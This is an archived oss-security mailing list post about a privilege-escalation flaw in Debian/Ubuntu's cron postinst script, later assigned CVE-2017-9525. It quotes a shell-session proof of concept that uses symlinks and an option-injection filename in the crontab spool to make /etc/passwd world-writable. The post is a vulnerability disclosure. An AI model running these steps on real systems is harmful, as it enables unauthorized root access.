Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Fri, 9 Jun 2017 20:31:24 +0200
From: Salvatore Bonaccorso <carnil@...ian.org>
To: oss-security@...ts.openwall.com
Subject: Re: Vixie/ISC Cron group crontab to root escalation

Hi

On Thu, Jun 08, 2017 at 08:05:34PM +0200, Solar Designer wrote:
> In 2003, the original patch went from Owl into Debian (and thus Ubuntu),
> along with the original comment above:
> 
> https://anonscm.debian.org/cgit/pkg-cron/pkg-cron.git/commit/?id=ce8f4773590dd76505631bd71874e999a85de607
> 
> Thanks to Salvatore Bonaccorso of Debian for locating the above URL for
> the current discussion.  In there, we also see the addition of a
> postinst script changing permissions on existing crontab files.  This
> was also pointed out by Seth Arnold of Ubuntu, who wrote:
> 
> | - postinst scripts are already brittle
> | - postinst scripts themselves become a target for elevating privileges if
> |   they'll just set the permissions as needed
> | 
> | But the Debian/Ubuntu packaging already has scripts for this purpose:
> | 
> | http://sources.debian.net/src/cron/3.0pl1-128/debian/postinst/#L53
> | 
> | ...
> | # Fixup crontab , directory and files for new group 'crontab'.
> | # Can't use dpkg-statoverride for this because it doesn't cooperate nicely
> | # with cron alternatives such as bcron
> | if [ -d $crondir/crontabs ] ; then
> |     chown root:crontab $crondir/crontabs
> |     chmod 1730 $crondir/crontabs
> |     # This used to be done conditionally. For versions prior to "3.0pl1-81"
> |     # It has been disabled to suit cron alternative such as bcron.
> |     cd $crondir/crontabs
> |     set +e
> |     ls -1 | xargs -r -n 1 --replace=xxx  chown 'xxx:crontab' 'xxx'
> |     ls -1 | xargs -r -n 1 chmod 600
> |     set -e
> | fi
> 
> Qualys promptly broke this script, replying to Seth:
> 
> | Hmmm, you're right, the script itself is vulnerable to
> | group-crontab-to-root escalation of privileges:
> | 
> | root@...ian:~# usermod --append --groups crontab nobody
> | root@...ian:~# su --login --shell /bin/bash nobody
> | No directory, logging in with HOME=/
> | 
> | nobody@...ian:/$ id
> | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),107(crontab)
> | 
> | nobody@...ian:/$ cd /var/spool/cron/crontabs
> | 
> | # for example, this exploits the chown
> | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd- nobody
> | 
> | # for example, this exploits the chmod
> | nobody@...ian:/var/spool/cron/crontabs$ touch ./--reference=.RFILE
> | nobody@...ian:/var/spool/cron/crontabs$ chmod 0666 .RFILE > .RFILE
> | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd 600
> | 
> | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd*
> | -rw-r--r-- 1 root root 1378 May 10 17:16 /etc/passwd
> | -rw------- 1 root root 1378 May 10 17:16 /etc/passwd-
> | 
> | # run the postinst script
> | root@...ian:~# dpkg-reconfigure cron
> | chown: missing operand
> | Try 'chown --help' for more information.
> | update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
> | 
> | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd*
> | -rw-rw-rw- 1    600 crontab 1378 May 10 17:16 /etc/passwd
> | -rw------- 1 nobody crontab 1378 May 10 17:16 /etc/passwd-
> | 
> | So this is a known issue?  (there may be more ways to exploit it --
> | spaces, newlines, option injections, etc).
> 
> So this looked like two issues to fix: the temporary file hard link
> attack (in OpenBSD, Debian, Ubuntu, ALT Linux, and Owl) and the postinst
> script (in Debian and Ubuntu).

For the record, the Debian and Ubuntu specific issue with the postinst
script has been assigned CVE-2017-9525.

For further discussion with the Debian cron maintainers I have as well
opened https://bugs.debian.org/864466

Regards,
Salvatore

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.